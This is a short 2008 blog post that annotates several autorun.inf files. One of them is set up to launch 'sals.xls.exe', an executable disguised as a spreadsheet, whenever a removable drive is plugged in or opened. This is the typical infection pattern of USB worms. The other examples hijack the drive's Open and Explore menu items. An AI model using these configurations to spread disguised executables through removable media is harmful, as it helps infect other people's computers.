Sunday, November 30, 2008

Explanations of autorun.inf files

The Autorun file through which the Explorer.exe file runs:

[autorun]
OPEN=EXPLORER.EXE //Target exe to run
shell\open=??(&O) //command that will be displayed when we right click instead of open
shell\open\Command=EXPLORER.EXE//The Shell command that will execute when we click the first option
shell\open\Default=1//Each time its clicked one copy of Explorer.exe is run
shell\explore=?????(&X)//command that will be displayed when we right click instead of explore
shell\explore\Command=EXPLORER.EXE // Instead of ur folder/drive being explored it will run Explorer.Exe


The Autorun file through which the sals.xls.exe file runs:

[AutoRun]
open=sals.xls.exe// as soon as the removable disk is plugged in then this command is executed instead of regular shell command to be executed
shellexecute=sals.xls.exe//The shell will execute this command
shell\Auto\command=sals.xls.exe//When the drive is autoplayed this command is executed
shell=Auto//Shell will by default try to Autoplay this drive coz of this command
[VVflagRun]
aabb=kdkfjdkfk11

The Autorun file through which the your internet explorer will run each time its executed :

[AutoRun]
open=iexplore.exe
shellexecute=iexplore.exe
shell\Auto\command=iexplore.exe
shell=Auto[VVflagRun]
aabb=kdkfjdkfk11



The Autorun file through which the notepad will run each time its executed :

[autorun]
OPEN=notepad.EXE
shell\open=??(&anyname)
shell\open\Command=notepad.EXE/
shell\open\Default=1
shell\explore=?????(&anyname)/
shell\explore\Command=notepad.EXE

WARNING: Please donot use these things to cause damage to people.

No comments: